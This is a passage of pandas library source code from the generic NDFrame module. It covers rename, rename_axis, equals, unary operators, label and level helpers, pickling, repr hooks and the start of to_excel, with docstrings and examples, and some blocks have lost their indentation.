a
0 1
Squeezing the rows produces a single scalar Series:
>>> df_0a.squeeze('rows')
a 1
Name: 0, dtype: int64
Squeezing all axes will project directly into a scalar:
>>> df_0a.squeeze()
1
"""
axis = self._AXIS_NAMES if axis is None else (self._get_axis_number(axis),)
return self.iloc[
tuple(
0 if i in axis and len(a) == 1 else slice(None)
for i, a in enumerate(self.axes)
)
]
# ----------------------------------------------------------------------
# Rename
    def rename(
        self: FrameOrSeries,
        mapper: Optional[Renamer] = None,
        *,
        index: Optional[Renamer] = None,
        columns: Optional[Renamer] = None,
        axis: Optional[Axis] = None,
        copy: bool = True,
        inplace: bool = False,
        level: Optional[Level] = None,
        errors: str = "ignore",
    ) -> Optional[FrameOrSeries]:
        """
        Alter axes input function or functions. Function / dict values must be
        unique (1-to-1). Labels not contained in a dict / Series will be left
        as-is. Extra labels listed don't throw an error. Alternatively, change
        ``Series.name`` with a scalar value (Series only).

        Parameters
        ----------
        %(axes)s : scalar, list-like, dict-like or function, optional
            Scalar or list-like will alter the ``Series.name`` attribute,
            and raise on DataFrame.
            dict-like or functions are transformations to apply to
            that axis' values
        copy : bool, default True
            Also copy underlying data.
        inplace : bool, default False
            Whether to return a new %(klass)s. If True then value of copy is
            ignored.
        level : int or level name, default None
            In case of a MultiIndex, only rename labels in the specified
            level.
        errors : {'ignore', 'raise'}, default 'ignore'
            If 'raise', raise a `KeyError` when a dict-like `mapper`, `index`,
            or `columns` contains labels that are not present in the Index
            being transformed.
            If 'ignore', existing keys will be renamed and extra keys will be
            ignored.

        Returns
        -------
        renamed : %(klass)s (new object)

        Raises
        ------
        KeyError
            If any of the labels is not found in the selected axis and
            "errors='raise'".

        See Also
        --------
        NDFrame.rename_axis

        Examples
        --------
        >>> s = pd.Series([1, 2, 3])
        >>> s
        0    1
        1    2
        2    3
        dtype: int64
        >>> s.rename("my_name")  # scalar, changes Series.name
        0    1
        1    2
        2    3
        Name: my_name, dtype: int64
        >>> s.rename(lambda x: x ** 2)  # function, changes labels
        0    1
        1    2
        4    3
        dtype: int64
        >>> s.rename({1: 3, 2: 5})  # mapping, changes labels
        0    1
        3    2
        5    3
        dtype: int64

        Since ``DataFrame`` doesn't have a ``.name`` attribute,
        only mapping-type arguments are allowed.

        >>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
        >>> df.rename(2)
        Traceback (most recent call last):
        ...
        TypeError: 'int' object is not callable

        ``DataFrame.rename`` supports two calling conventions

        * ``(index=index_mapper, columns=columns_mapper, ...)``
        * ``(mapper, axis={'index', 'columns'}, ...)``

        We *highly* recommend using keyword arguments to clarify your
        intent.

        >>> df.rename(index=str, columns={"A": "a", "B": "c"})
           a  c
        0  1  4
        1  2  5
        2  3  6
        >>> df.rename(index=str, columns={"A": "a", "C": "c"})
           a  B
        0  1  4
        1  2  5
        2  3  6

        Using axis-style parameters

        >>> df.rename(str.lower, axis='columns')
           a  b
        0  1  4
        1  2  5
        2  3  6
        >>> df.rename({1: 2, 2: 4}, axis='index')
           A  B
        0  1  4
        2  2  5
        4  3  6

        See the :ref:`user guide <basics.rename>` for more.
        """
        if mapper is None and index is None and columns is None:
            raise TypeError("must pass an index to rename")
        # Normalize the two calling conventions: explicit index=/columns=
        # keywords are mutually exclusive with mapper/axis.
        if index is not None or columns is not None:
            if axis is not None:
                raise TypeError(
                    "Cannot specify both 'axis' and any of 'index' or 'columns'"
                )
            elif mapper is not None:
                raise TypeError(
                    "Cannot specify both 'mapper' and any of 'index' or 'columns'"
                )
        else:
            # use the mapper argument
            if axis and self._get_axis_number(axis) == 1:
                columns = mapper
            else:
                index = mapper
        result = self if inplace else self.copy(deep=copy)
        # axis_no 0 -> index replacements, axis_no 1 -> columns replacements.
        for axis_no, replacements in enumerate((index, columns)):
            if replacements is None:
                continue
            ax = self._get_axis(axis_no)
            baxis = self._get_block_manager_axis(axis_no)
            f = com.get_rename_function(replacements)
            if level is not None:
                level = ax._get_level_number(level)
            # GH 13473
            if not callable(replacements):
                # Under errors='raise', reject dict-like mappers containing
                # labels missing from the axis (indexer == -1).
                indexer = ax.get_indexer_for(replacements)
                if errors == "raise" and len(indexer[indexer == -1]):
                    missing_labels = [
                        label
                        for index, label in enumerate(replacements)
                        if indexer[index] == -1
                    ]
                    raise KeyError(f"{missing_labels} not found in axis")
            result._data = result._data.rename_axis(
                f, axis=baxis, copy=copy, level=level
            )
            result._clear_item_cache()
        if inplace:
            self._update_inplace(result._data)
            return None
        else:
            return result.__finalize__(self)
    @rewrite_axis_style_signature("mapper", [("copy", True), ("inplace", False)])
    def rename_axis(self, mapper=lib.no_default, **kwargs):
        """
        Set the name of the axis for the index or columns.

        Parameters
        ----------
        mapper : scalar, list-like, optional
            Value to set the axis name attribute.
        index, columns : scalar, list-like, dict-like or function, optional
            A scalar, list-like, dict-like or functions transformations to
            apply to that axis' values.

            Use either ``mapper`` and ``axis`` to
            specify the axis to target with ``mapper``, or ``index``
            and/or ``columns``.

            .. versionchanged:: 0.24.0

        axis : {0 or 'index', 1 or 'columns'}, default 0
            The axis to rename.
        copy : bool, default True
            Also copy underlying data.
        inplace : bool, default False
            Modifies the object directly, instead of creating a new Series
            or DataFrame.

        Returns
        -------
        Series, DataFrame, or None
            The same type as the caller or None if `inplace` is True.

        See Also
        --------
        Series.rename : Alter Series index labels or name.
        DataFrame.rename : Alter DataFrame index labels or name.
        Index.rename : Set new names on index.

        Notes
        -----
        ``DataFrame.rename_axis`` supports two calling conventions

        * ``(index=index_mapper, columns=columns_mapper, ...)``
        * ``(mapper, axis={'index', 'columns'}, ...)``

        The first calling convention will only modify the names of
        the index and/or the names of the Index object that is the columns.
        In this case, the parameter ``copy`` is ignored.

        The second calling convention will modify the names of the
        the corresponding index if mapper is a list or a scalar.
        However, if mapper is dict-like or a function, it will use the
        deprecated behavior of modifying the axis *labels*.

        We *highly* recommend using keyword arguments to clarify your
        intent.

        Examples
        --------
        **Series**

        >>> s = pd.Series(["dog", "cat", "monkey"])
        >>> s
        0       dog
        1       cat
        2    monkey
        dtype: object
        >>> s.rename_axis("animal")
        animal
        0    dog
        1    cat
        2    monkey
        dtype: object

        **DataFrame**

        >>> df = pd.DataFrame({"num_legs": [4, 4, 2],
        ...                    "num_arms": [0, 0, 2]},
        ...                   ["dog", "cat", "monkey"])
        >>> df
                num_legs  num_arms
        dog            4         0
        cat            4         0
        monkey         2         2
        >>> df = df.rename_axis("animal")
        >>> df
                num_legs  num_arms
        animal
        dog            4         0
        cat            4         0
        monkey         2         2
        >>> df = df.rename_axis("limbs", axis="columns")
        >>> df
        limbs   num_legs  num_arms
        animal
        dog            4         0
        cat            4         0
        monkey         2         2

        **MultiIndex**

        >>> df.index = pd.MultiIndex.from_product([['mammal'],
        ...                                        ['dog', 'cat', 'monkey']],
        ...                                       names=['type', 'name'])
        >>> df
                       limbs  num_legs  num_arms
        type   name
        mammal dog         4         0
               cat         4         0
               monkey      2         2
        >>> df.rename_axis(index={'type': 'class'})
                       limbs  num_legs  num_arms
        class  name
        mammal dog         4         0
               cat         4         0
               monkey      2         2
        >>> df.rename_axis(columns=str.upper)
                       LIMBS  num_legs  num_arms
        type   name
        mammal dog         4         0
               cat         4         0
               monkey      2         2
        """
        # The decorator rewrites positional axis-style arguments into
        # kwargs; unpack them into a per-axis mapping here.
        axes, kwargs = self._construct_axes_from_arguments(
            (), kwargs, sentinel=lib.no_default
        )
        copy = kwargs.pop("copy", True)
        inplace = kwargs.pop("inplace", False)
        axis = kwargs.pop("axis", 0)
        if axis is not None:
            axis = self._get_axis_number(axis)
        if kwargs:
            raise TypeError(
                "rename_axis() got an unexpected keyword "
                f'argument "{list(kwargs.keys())[0]}"'
            )
        inplace = validate_bool_kwarg(inplace, "inplace")
        if mapper is not lib.no_default:
            # Use v0.23 behavior if a scalar or list
            non_mapper = is_scalar(mapper) or (
                is_list_like(mapper) and not is_dict_like(mapper)
            )
            if non_mapper:
                return self._set_axis_name(mapper, axis=axis, inplace=inplace)
            else:
                raise ValueError("Use `.rename` to alter labels with a mapper.")
        else:
            # Use new behavior. Means that index and/or columns
            # is specified
            result = self if inplace else self.copy(deep=copy)
            for axis in range(self._AXIS_LEN):
                v = axes.get(self._AXIS_NAMES[axis])
                if v is lib.no_default:
                    continue
                # Scalars/lists set the name(s) directly; dicts/functions
                # are applied to the existing level names.
                non_mapper = is_scalar(v) or (is_list_like(v) and not is_dict_like(v))
                if non_mapper:
                    newnames = v
                else:
                    f = com.get_rename_function(v)
                    curnames = self._get_axis(axis).names
                    newnames = [f(name) for name in curnames]
                result._set_axis_name(newnames, axis=axis, inplace=True)
            if not inplace:
                return result
    def _set_axis_name(self, name, axis=0, inplace=False):
        """
        Set the name(s) of the axis.

        Parameters
        ----------
        name : str or list of str
            Name(s) to set.
        axis : {0 or 'index', 1 or 'columns'}, default 0
            The axis to set the label. The value 0 or 'index' specifies index,
            and the value 1 or 'columns' specifies columns.
        inplace : bool, default False
            If `True`, do operation inplace and return None.

            .. versionadded:: 0.21.0

        Returns
        -------
        Series, DataFrame, or None
            The same type as the caller or `None` if `inplace` is `True`.

        See Also
        --------
        DataFrame.rename : Alter the axis labels of :class:`DataFrame`.
        Series.rename : Alter the index labels or set the index name
            of :class:`Series`.
        Index.rename : Set the name of :class:`Index` or :class:`MultiIndex`.

        Examples
        --------
        >>> df = pd.DataFrame({"num_legs": [4, 4, 2]},
        ...                   ["dog", "cat", "monkey"])
        >>> df
                num_legs
        dog            4
        cat            4
        monkey         2
        >>> df._set_axis_name("animal")
                num_legs
        animal
        dog            4
        cat            4
        monkey         2
        >>> df.index = pd.MultiIndex.from_product(
        ...                [["mammal"], ['dog', 'cat', 'monkey']])
        >>> df._set_axis_name(["type", "name"])
                       legs
        type   name
        mammal dog        4
               cat        4
               monkey     2
        """
        axis = self._get_axis_number(axis)
        # set_names returns a new Index with the requested name(s).
        idx = self._get_axis(axis).set_names(name)
        inplace = validate_bool_kwarg(inplace, "inplace")
        renamed = self if inplace else self.copy()
        renamed.set_axis(idx, axis=axis, inplace=True)
        if not inplace:
            return renamed
# ----------------------------------------------------------------------
# Comparison Methods
def _indexed_same(self, other) -> bool:
return all(
self._get_axis(a).equals(other._get_axis(a)) for a in self._AXIS_ORDERS
)
def equals(self, other):
"""
Test whether two objects contain the same elements.
This function allows two Series or DataFrames to be compared against
each other to see if they have the same shape and elements. NaNs in
the same location are considered equal. The column headers do not
need to have the same type, but the elements within the columns must
be the same dtype.
Parameters
----------
other : Series or DataFrame
The other Series or DataFrame to be compared with the first.
Returns
-------
bool
True if all elements are the same in both objects, False
otherwise.
See Also
--------
Series.eq : Compare two Series objects of the same length
and return a Series where each element is True if the element
in each Series is equal, False otherwise.
DataFrame.eq : Compare two DataFrame objects of the same shape and
return a DataFrame where each element is True if the respective
element in each DataFrame is equal, False otherwise.
testing.assert_series_equal : Raises an AssertionError if left and
right are not equal. Provides an easy interface to ignore
inequality in dtypes, indexes and precision among others.
testing.assert_frame_equal : Like assert_series_equal, but targets
DataFrames.
numpy.array_equal : Return True if two arrays have the same shape
and elements, False otherwise.
Notes
-----
This function requires that the elements have the same dtype as their
respective elements in the other Series or DataFrame. However, the
column labels do not need to have the same type, as long as they are
still considered equal.
Examples
--------
>>> df = pd.DataFrame({1: [10], 2: [20]})
>>> df
1 2
0 10 20
DataFrames df and exactly_equal have the same types and values for
their elements and column labels, which will return True.
>>> exactly_equal = pd.DataFrame({1: [10], 2: [20]})
>>> exactly_equal
1 2
0 10 20
>>> df.equals(exactly_equal)
True
DataFrames df and different_column_type have the same element
types and values, but have different types for the column labels,
which will still return True.
>>> different_column_type = pd.DataFrame({1.0: [10], 2.0: [20]})
>>> different_column_type
1.0 2.0
0 10 20
>>> df.equals(different_column_type)
True
DataFrames df and different_data_type have different types for the
same values for their elements, and will return False even though
their column labels are the same values and types.
>>> different_data_type = pd.DataFrame({1: [10.0], 2: [20.0]})
>>> different_data_type
1 2
0 10.0 20.0
>>> df.equals(different_data_type)
False
"""
if not isinstance(other, self._constructor):
return False
return self._data.equals(other._data)
# -------------------------------------------------------------------------
# Unary Methods
    def __neg__(self):
        # Unary minus: booleans are logically inverted; numeric, timedelta
        # and object dtypes are arithmetically negated.
        values = com.values_from_object(self)
        if is_bool_dtype(values):
            arr = operator.inv(values)
        elif (
            is_numeric_dtype(values)
            or is_timedelta64_dtype(values)
            or is_object_dtype(values)
        ):
            arr = operator.neg(values)
        else:
            raise TypeError(f"Unary negative expects numeric dtype, not {values.dtype}")
        # Re-box the raw ndarray result with this object's axes.
        return self.__array_wrap__(arr)
    def __pos__(self):
        # Unary plus: booleans and period-like values pass through
        # unchanged; numeric, timedelta and object dtypes get operator.pos.
        values = com.values_from_object(self)
        if is_bool_dtype(values) or is_period_arraylike(values):
            arr = values
        elif (
            is_numeric_dtype(values)
            or is_timedelta64_dtype(values)
            or is_object_dtype(values)
        ):
            arr = operator.pos(values)
        else:
            raise TypeError(f"Unary plus expects numeric dtype, not {values.dtype}")
        # Re-box the raw ndarray result with this object's axes.
        return self.__array_wrap__(arr)
    def __invert__(self):
        # Elementwise bitwise/logical NOT via the block manager.
        if not self.size:
            # inv fails with 0 len
            return self
        new_data = self._data.apply(operator.invert)
        result = self._constructor(new_data).__finalize__(self)
        return result
def __nonzero__(self):
raise ValueError(
f"The truth value of a {type(self).__name__} is ambiguous. "
"Use a.empty, a.bool(), a.item(), a.any() or a.all()."
)
__bool__ = __nonzero__
    def bool(self):
        """
        Return the bool of a single element PandasObject.

        This must be a boolean scalar value, either True or False. Raise a
        ValueError if the PandasObject does not have exactly 1 element, or that
        element is not boolean

        Returns
        -------
        bool
            Same single boolean value converted to bool type.
        """
        # Squeeze first: a 1-element object collapses to its scalar element.
        v = self.squeeze()
        if isinstance(v, (bool, np.bool_)):
            return bool(v)
        elif is_scalar(v):
            # Exactly one element, but it is not a boolean.
            raise ValueError(
                "bool cannot act on a non-boolean single element "
                f"{type(self).__name__}"
            )
        # More than one element remains: delegate to __nonzero__, which
        # raises the standard "truth value is ambiguous" ValueError.
        self.__nonzero__()
    def __abs__(self: FrameOrSeries) -> FrameOrSeries:
        # ``abs(obj)`` delegates to the public .abs() method.
        return self.abs()
    def __round__(self: FrameOrSeries, decimals: int = 0) -> FrameOrSeries:
        # ``round(obj, n)`` delegates to the public .round() method.
        return self.round(decimals)
# -------------------------------------------------------------------------
# Label or Level Combination Helpers
#
# A collection of helper methods for DataFrame/Series operations that
# accept a combination of column/index labels and levels. All such
# operations should utilize/extend these methods when possible so that we
# have consistent precedence and validation logic throughout the library.
    def _is_level_reference(self, key, axis=0) -> bool_t:
        """
        Test whether a key is a level reference for a given axis.

        To be considered a level reference, `key` must be a string that:
          - (axis=0): Matches the name of an index level and does NOT match
            a column label.
          - (axis=1): Matches the name of a column level and does NOT match
            an index label.

        Parameters
        ----------
        key : str
            Potential level name for the given axis
        axis : int, default 0
            Axis that levels are associated with (0 for index, 1 for columns)

        Returns
        -------
        is_level : bool
        """
        axis = self._get_axis_number(axis)
        # A label reference on the other axis takes precedence, so a key
        # that is both is NOT treated as a level reference here.
        return (
            key is not None
            and is_hashable(key)
            and key in self.axes[axis].names
            and not self._is_label_reference(key, axis=axis)
        )
    def _is_label_reference(self, key, axis=0) -> bool_t:
        """
        Test whether a key is a label reference for a given axis.

        To be considered a label reference, `key` must be a string that:
          - (axis=0): Matches a column label
          - (axis=1): Matches an index label

        Parameters
        ----------
        key: str
            Potential label name
        axis: int, default 0
            Axis perpendicular to the axis that labels are associated with
            (0 means search for column labels, 1 means search for index labels)

        Returns
        -------
        is_label: bool
        """
        axis = self._get_axis_number(axis)
        # Labels live on the axes OTHER than ``axis``.
        other_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
        return (
            key is not None
            and is_hashable(key)
            and any(key in self.axes[ax] for ax in other_axes)
        )
def _is_label_or_level_reference(self, key: str, axis: int = 0) -> bool_t:
"""
Test whether a key is a label or level reference for a given axis.
To be considered either a label or a level reference, `key` must be a
string that:
- (axis=0): Matches a column label or an index level
- (axis=1): Matches an index label or a column level
Parameters
----------
key: str
Potential label or level name
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_label_or_level: bool
"""
return self._is_level_reference(key, axis=axis) or self._is_label_reference(
key, axis=axis
)
    def _check_label_or_level_ambiguity(self, key, axis: int = 0) -> None:
        """
        Check whether `key` is ambiguous.

        By ambiguous, we mean that it matches both a level of the input
        `axis` and a label of the other axis.

        Parameters
        ----------
        key: str or object
            Label or level name.
        axis: int, default 0
            Axis that levels are associated with (0 for index, 1 for columns).

        Raises
        ------
        ValueError: `key` is ambiguous
        """
        axis = self._get_axis_number(axis)
        other_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
        # Ambiguous = both a level name on ``axis`` AND a label on some
        # other axis.
        if (
            key is not None
            and is_hashable(key)
            and key in self.axes[axis].names
            and any(key in self.axes[ax] for ax in other_axes)
        ):
            # Build an informative and grammatical warning
            level_article, level_type = (
                ("an", "index") if axis == 0 else ("a", "column")
            )
            label_article, label_type = (
                ("a", "column") if axis == 0 else ("an", "index")
            )
            msg = (
                f"'{key}' is both {level_article} {level_type} level and "
                f"{label_article} {label_type} label, which is ambiguous."
            )
            raise ValueError(msg)
    def _get_label_or_level_values(self, key: str, axis: int = 0) -> np.ndarray:
        """
        Return a 1-D array of values associated with `key`, a label or level
        from the given `axis`.

        Retrieval logic:
          - (axis=0): Return column values if `key` matches a column label.
            Otherwise return index level values if `key` matches an index
            level.
          - (axis=1): Return row values if `key` matches an index label.
            Otherwise return column level values if 'key' matches a column
            level

        Parameters
        ----------
        key: str
            Label or level name.
        axis: int, default 0
            Axis that levels are associated with (0 for index, 1 for columns)

        Returns
        -------
        values: np.ndarray

        Raises
        ------
        KeyError
            if `key` matches neither a label nor a level
        ValueError
            if `key` matches multiple labels, or if `key` is ambiguous
            (matches both a level of `axis` and a label of the other axis)
        """
        axis = self._get_axis_number(axis)
        other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
        # Labels take precedence over levels (after the ambiguity check).
        if self._is_label_reference(key, axis=axis):
            self._check_label_or_level_ambiguity(key, axis=axis)
            values = self.xs(key, axis=other_axes[0])._values
        elif self._is_level_reference(key, axis=axis):
            values = self.axes[axis].get_level_values(key)._values
        else:
            raise KeyError(key)
        # Check for duplicates: xs on a duplicated label yields a 2-D
        # result, which is not a valid 1-D values array.
        if values.ndim > 1:
            if other_axes and isinstance(self._get_axis(other_axes[0]), MultiIndex):
                multi_message = (
                    "\n"
                    "For a multi-index, the label must be a "
                    "tuple with elements corresponding to each level."
                )
            else:
                multi_message = ""
            label_axis_name = "column" if axis == 0 else "index"
            raise ValueError(
                (
                    f"The {label_axis_name} label '{key}' "
                    f"is not unique.{multi_message}"
                )
            )
        return values
    def _drop_labels_or_levels(self, keys, axis: int = 0):
        """
        Drop labels and/or levels for the given `axis`.

        For each key in `keys`:
          - (axis=0): If key matches a column label then drop the column.
            Otherwise if key matches an index level then drop the level.
          - (axis=1): If key matches an index label then drop the row.
            Otherwise if key matches a column level then drop the level.

        Parameters
        ----------
        keys: str or list of str
            labels or levels to drop
        axis: int, default 0
            Axis that levels are associated with (0 for index, 1 for columns)

        Returns
        -------
        dropped: DataFrame

        Raises
        ------
        ValueError
            if any `keys` match neither a label nor a level
        """
        axis = self._get_axis_number(axis)
        # Validate keys
        keys = com.maybe_make_list(keys)
        invalid_keys = [
            k for k in keys if not self._is_label_or_level_reference(k, axis=axis)
        ]
        if invalid_keys:
            raise ValueError(
                (
                    "The following keys are not valid labels or "
                    f"levels for axis {axis}: {invalid_keys}"
                )
            )
        # Compute levels and labels to drop
        levels_to_drop = [k for k in keys if self._is_level_reference(k, axis=axis)]
        labels_to_drop = [k for k in keys if not self._is_level_reference(k, axis=axis)]
        # Perform copy upfront and then use inplace operations below.
        # This ensures that we always perform exactly one copy.
        # ``copy`` and/or ``inplace`` options could be added in the future.
        dropped = self.copy()
        if axis == 0:
            # Handle dropping index levels
            if levels_to_drop:
                dropped.reset_index(levels_to_drop, drop=True, inplace=True)
            # Handle dropping columns labels
            if labels_to_drop:
                dropped.drop(labels_to_drop, axis=1, inplace=True)
        else:
            # Handle dropping column levels
            if levels_to_drop:
                if isinstance(dropped.columns, MultiIndex):
                    # Drop the specified levels from the MultiIndex
                    dropped.columns = dropped.columns.droplevel(levels_to_drop)
                else:
                    # Drop the last level of Index by replacing with
                    # a RangeIndex
                    dropped.columns = RangeIndex(dropped.columns.size)
            # Handle dropping index labels
            if labels_to_drop:
                dropped.drop(labels_to_drop, axis=0, inplace=True)
        return dropped
# ----------------------------------------------------------------------
# Iteration
def __hash__(self):
raise TypeError(
f"{repr(type(self).__name__)} objects are mutable, "
f"thus they cannot be hashed"
)
def __iter__(self):
"""
Iterate over info axis.
Returns
-------
iterator
Info axis as iterator.
"""
return iter(self._info_axis)
# can we get a better explanation of this?
    def keys(self):
        """
        Get the 'info axis' (see Indexing for more).

        This is index for Series, columns for DataFrame.

        Returns
        -------
        Index
            Info axis.
        """
        return self._info_axis
def items(self):
"""
Iterate over (label, values) on info axis
This is index for Series and columns for DataFrame.
Returns
-------
Generator
"""
for h in self._info_axis:
yield h, self[h]
    # Legacy alias kept for backward compatibility; prefer ``items``.
    @Appender(items.__doc__)
    def iteritems(self):
        return self.items()
    def __len__(self) -> int:
        """Returns length of info axis"""
        # len(df) == number of rows; len(series) == number of elements.
        return len(self._info_axis)
def __contains__(self, key) -> bool_t:
"""True if the key is in the info axis"""
return key in self._info_axis
@property
def empty(self) -> bool_t:
"""
Indicator whether DataFrame is empty.
True if DataFrame is entirely empty (no items), meaning any of the
axes are of length 0.
Returns
-------
bool
If DataFrame is empty, return True, if not return False.
See Also
--------
Series.dropna : Return series without null values.
DataFrame.dropna : Return DataFrame with labels on given axis omitted
where (all or any) data are missing.
Notes
-----
If DataFrame contains only NaNs, it is still not considered empty. See
the example below.
Examples
--------
An example of an actual empty DataFrame. Notice the index is empty:
>>> df_empty = pd.DataFrame({'A' : []})
>>> df_empty
Empty DataFrame
Columns: [A]
Index: []
>>> df_empty.empty
True
If we only have NaNs in our DataFrame, it is not considered empty! We
will need to drop the NaNs to make the DataFrame empty:
>>> df = pd.DataFrame({'A' : [np.nan]})
>>> df
A
0 NaN
>>> df.empty
False
>>> df.dropna().empty
True
"""
return any(len(self._get_axis(a)) == 0 for a in self._AXIS_ORDERS)
# ----------------------------------------------------------------------
# Array Interface
# This is also set in IndexOpsMixin
# GH#23114 Ensure ndarray.__op__(DataFrame) returns NotImplemented
    # High priority so that ndarray.__op__(NDFrame) defers to pandas
    # (GH#23114: ensures NotImplemented is returned by numpy's side).
    __array_priority__ = 1000
    def __array__(self, dtype=None) -> np.ndarray:
        # numpy conversion hook; note ``dtype`` is accepted but not
        # forwarded here — values_from_object decides the result dtype.
        return com.values_from_object(self)
    def __array_wrap__(self, result, context=None):
        # numpy ufunc hook: re-box a raw ndarray result with this
        # object's axes and metadata.
        result = lib.item_from_zerodim(result)
        if is_scalar(result):
            # e.g. we get here with np.ptp(series)
            # ptp also requires the item_from_zerodim
            return result
        d = self._construct_axes_dict(self._AXIS_ORDERS, copy=False)
        return self._constructor(result, **d).__finalize__(self)
# ideally we would define this to avoid the getattr checks, but
# is slower
# @property
# def __array_interface__(self):
# """ provide numpy array interface method """
# values = self.values
# return dict(typestr=values.dtype.str,shape=values.shape,data=values)
# ----------------------------------------------------------------------
# Picklability
def __getstate__(self) -> Dict[str, Any]:
meta = {k: getattr(self, k, None) for k in self._metadata}
return dict(
_data=self._data,
_typ=self._typ,
_metadata=self._metadata,
attrs=self.attrs,
**meta,
)
    def __setstate__(self, state):
        # Restore pickled state. Accepts either a bare BlockManager (old
        # form) or the dict produced by __getstate__.
        if isinstance(state, BlockManager):
            self._data = state
        elif isinstance(state, dict):
            typ = state.get("_typ")
            if typ is not None:
                # NOTE(review): __getstate__ stores the attrs dict under the
                # key "attrs", but this reads "_attrs" — presumably the
                # fallback loop below restores "attrs" via __setattr__;
                # verify the round-trip actually preserves attrs.
                attrs = state.get("_attrs", {})
                object.__setattr__(self, "_attrs", attrs)
                # set in the order of internal names
                # to avoid definitional recursion
                # e.g. say fill_value needing _data to be
                # defined
                meta = set(self._internal_names + self._metadata)
                for k in list(meta):
                    if k in state:
                        v = state[k]
                        object.__setattr__(self, k, v)
                # Any remaining state keys are set verbatim.
                for k, v in state.items():
                    if k not in meta:
                        object.__setattr__(self, k, v)
            else:
                raise NotImplementedError("Pre-0.12 pickles are no longer supported")
        elif len(state) == 2:
            raise NotImplementedError("Pre-0.12 pickles are no longer supported")
        # Item cache is never pickled; start fresh.
        self._item_cache = {}
# ----------------------------------------------------------------------
# Rendering Methods
def __repr__(self) -> str:
    """
    Return a terse string representation built by iterating over self
    (by definition, pandas containers are iterable).
    """
    joined = ",".join(map(pprint_thing, self))
    return f"{type(self).__name__}([{joined}])"
def _repr_latex_(self):
    """
    LaTeX repr hook, mainly for nbconvert (notebook -> pdf).

    Returns ``to_latex()`` output when the ``display.latex.repr`` option
    is enabled, otherwise None.
    """
    if not config.get_option("display.latex.repr"):
        return None
    return self.to_latex()
def _repr_data_resource_(self):
    """
    Table-schema repr, active when ``display.html.table_schema`` is on.

    Not a real Jupyter special repr method, but we use the same naming
    convention. Returns the head of the data serialized with
    ``orient="table"`` and parsed back into an ordered payload, or
    ``None`` when the option is disabled.
    """
    if not config.get_option("display.html.table_schema"):
        return None
    head = self.head(config.get_option("display.max_rows"))
    as_json = head.to_json(orient="table")
    return json.loads(as_json, object_pairs_hook=collections.OrderedDict)
# ----------------------------------------------------------------------
# I/O Methods
_shared_docs[
"to_markdown"
] = """
Print %(klass)s in Markdown-friendly format.
.. versionadded:: 1.0.0
Parameters
----------
buf : str, Path or StringIO-like, optional, default None
Buffer to write to. If None, the output is returned as a string.
mode : str, optional
Mode in which file is opened.
**kwargs
These parameters will be passed to `tabulate`.
Returns
-------
str
%(klass)s in Markdown-friendly format.
"""
_shared_docs[
"to_excel"
] = """
Write %(klass)s to an Excel sheet.
To write a single %(klass)s to an Excel .xlsx file it is only necessary to
specify a target file name. To write to multiple sheets it is necessary to
create an `ExcelWriter` object with a target file name, and specify a sheet
in the file to write to.
Multiple sheets may be written to by specifying unique `sheet_name`.
With all data written to the file it is necessary to save the changes.
Note that creating an `ExcelWriter` object with a file name that already
exists will result in the contents of the existing file being erased.
Parameters
----------
excel_writer : str or ExcelWriter object
File path or existing ExcelWriter.
sheet_name : str, default 'Sheet1'
Name of sheet which will contain DataFrame.
na_rep : str, default ''
Missing data representation.
float_format : str, optional
Format string for floating point numbers. For example
``float_format="%%.2f"`` will format 0.1234 to 0.12.
columns : sequence or list of str, optional
Columns to write.
header : bool or list of str, default True
Write out the column names. If a list of string is given it is
assumed to be aliases for the column names.
index : bool, default True
Write row names (index).
index_label : str or sequence, optional
Column label for index column(s) if desired. If not specified, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : int, default 0
Upper left cell row to dump data frame.
startcol : int, default 0
Upper left cell column to dump data frame.
engine : str, optional
Write engine to use, 'openpyxl' or 'xlsxwriter'. You can also set this
via the options ``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
merge_cells : bool, default True
Write MultiIndex and Hierarchical Rows as merged cells.
encoding : str, optional
Encoding of the resulting excel file. Only necessary for xlwt,
other writers support unicode natively.
inf_rep : str, default 'inf'
Representation for infinity (there is no native representation for
infinity in Excel).
verbose : bool, default True
Display more information in the error logs.
freeze_panes : tuple of int (length 2), optional
Specifies the one-based bottommost row and rightmost column that
is to be frozen.
See Also
--------
to_csv : Write DataFrame to a comma-separated values (csv) file.
ExcelWriter : Class for writing DataFrame objects into excel sheets.
read_excel : Read an Excel file into a pandas DataFrame.
read_csv : Read a comma-separated values (csv) file into DataFrame.
Notes
-----
For compatibility with :meth:`~DataFrame.to_csv`,
to_excel serializes lists and dicts to strings before writing.
Once a workbook has been saved it is not possible write further data
without rewriting the whole workbook.
Examples
--------
Create, write to and save a workbook:
>>> df1 = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df1.to_excel("output.xlsx") # doctest: +SKIP
To specify the sheet name:
>>> df1.to_excel("output.xlsx",
... sheet_name='Sheet_name_1') # doctest: +SKIP
If you wish to write to more than one sheet in the workbook, it is
necessary to specify an ExcelWriter object:
>>> df2 = df1.copy()
>>> with pd.ExcelWriter('output.xlsx') as writer: # doctest: +SKIP
... df1.to_excel(writer, sheet_name='Sheet_name_1')
... df2.to_excel(writer, sheet_name='Sheet_name_2')
ExcelWriter can also be used to append to an existing Excel file:
>>> with pd.ExcelWriter('output.xlsx',
... mode='a') as writer: # doctest: +SKIP
... df.to_excel(writer, sheet_name='Sheet_name_3')
To set the library that is used to write the Excel file,
you can pass the `engine` keyword (the default engine is
automatically chosen depending on the file extension):
>>> df1.to_excel('output1.xlsx', engine='xlsxwriter') # doctest: +SKIP
"""
@Appender(_shared_docs["to_excel"] % dict(klass="object"))
def to_excel(
    self,
    excel_writer,
    sheet_name="Sheet1",
    na_rep="",
    float_format=None,
    columns=None,
    header=True,
    index=True,
    index_label=None,
    startrow=0,
    startcol=0,
    engine=None,
    merge_cells=True,
    encoding=None,
    inf_rep="inf",
    verbose=True,
    freeze_panes=None,
) -> None:
    from pandas.io.formats.excel import ExcelFormatter

    # A Series is promoted to a one-column frame so that a single code
    # path can hand off to the excel formatter.
    if isinstance(self, ABCDataFrame):
        frame = self
    else:
        frame = self.to_frame()

    excel_formatter = ExcelFormatter(
        frame,
